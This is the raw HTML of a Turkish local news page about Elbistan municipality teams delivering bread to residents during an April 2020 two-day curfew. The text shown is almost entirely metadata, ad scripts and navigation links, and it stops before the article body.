
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Elbistan Belediyesi 2 günlük sokağa çıkma yasağı nedeniyle evlerinde kalan vatandaşlara ekmek dağıtımı gerçekleştiriyor."> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada"> <meta property="og:description" content="Elbistan Belediyesi 2 günlük sokağa çıkma yasağı nedeniyle evlerinde kalan vatandaşlara ekmek dağıtımı gerçekleştiriyor."> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada"> <meta name="twitter:description" content="Elbistan Belediyesi, 2 günlük sokağa çıkma yasağı nedeniyle evlerinde kalan vatandaşlara ekmek dağıtımı gerçekleştiriyor."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg" /> <meta itemprop="headline" content="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2020-04-11T16:05:18+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="ca-pub-9060105052041849" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/seyyar-saticilarin-urunlerini-elbistan-belediyesi-satin-alacak-h66338.html" title="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak" >Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistana-sessizlik-hakim-oldu-h66337.html" title="Elbistan’a sessizlik hakim oldu" >Elbistan’a sessizlik hakim oldu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html" title="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada" >Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/gida-yardimlari-evlerinde-teslim-ediliyor-h66335.html" title="Gıda yardımları evlerinde teslim ediliyor" >Gıda yardımları evlerinde teslim ediliyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/bolgede-ilk-kez-goruldu-sakin-oldurmeyin-h66334.html" title="Bölgede ilk kez görüldü, sakın öldürmeyin!" >Bölgede ilk kez görüldü, sakın öldürmeyin!</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kumbarasindaki-parayi-milli-dayanisma-kampanyasina-bagisladi-h66333.html" title="Kumbarasındaki parayı Milli Dayanışma Kampanyasına bağışladı" >Kumbarasındaki parayı Milli Dayanışma Kampanyasına bağışladı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-175yil-ziyareti-h66332.html" title="Kaymakam Demir’den 175.yıl ziyareti" >Kaymakam Demir’den 175.yıl ziyareti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/oztunc-ciftciler-plan-degil-pilav-istiyor-pilav-h66331.html" title="Öztunç: “Çiftçiler plan değil pilav istiyor pilav!”" >Öztunç: “Çiftçiler plan değil pilav istiyor pilav!”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html" title="Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek" >Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasaginin-kapsami-belli-oldu-h66329.html" title="Sokağa çıkma yasağının kapsamı belli oldu" >Sokağa çıkma yasağının kapsamı belli oldu</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="e578f8066e71022f84de0252bd983198bbc9ed53" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mevlut-isik-h66327.html" title="Mevlüt Işık"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/mevlut_isik_h66327_f0fde.jpg" alt="Mevlüt Işık" /> Mevlüt Işık</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ali-ucuk-65-yasinda-h66322.html" title="Ali Ücük 65 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/ali_ucuk_65_yasinda_h66322_81875.jpg" alt="Ali Ücük 65 yaşında," /> Ali Ücük 65 yaşında,</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/nimet-eser-71-yasinda-h66317.html" title="Nimet Eser 71 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/nimet_eser_71_yasinda_h66317_55e51.jpg" alt="Nimet Eser 71 yaşında" /> Nimet Eser 71 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/yasar-cek-80-yasinda-h66310.html" title="Yaşar Çek 80 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/yasar_cek_80_yasinda_h66310_0f137.jpg" alt="Yaşar Çek 80 yaşında," /> Yaşar Çek 80 yaşında,</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/seyyar-saticilarin-urunlerini-elbistan-belediyesi-satin-alacak-h66338.html" title="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/seyyar_saticilarin_urunlerini_elbistan_belediyesi_satin_alacak_h66338_618e6.jpg" alt="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak" /> Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistana-sessizlik-hakim-oldu-h66337.html" title="Elbistan’a sessizlik hakim oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/elbistana_sessizlik_hakim_oldu_h66337_74927.JPG" alt="Elbistan’a sessizlik hakim oldu" /> Elbistan’a sessizlik hakim oldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html" title="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg" alt="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada" /> Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/gida-yardimlari-evlerinde-teslim-ediliyor-h66335.html" title="Gıda yardımları evlerinde teslim ediliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/gida_yarimlari_evlerinde_teslim_ediliyor_h66335_5729f.jpg" alt="Gıda yardımları evlerinde teslim ediliyor" /> Gıda yardımları evlerinde teslim ediliyor</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a 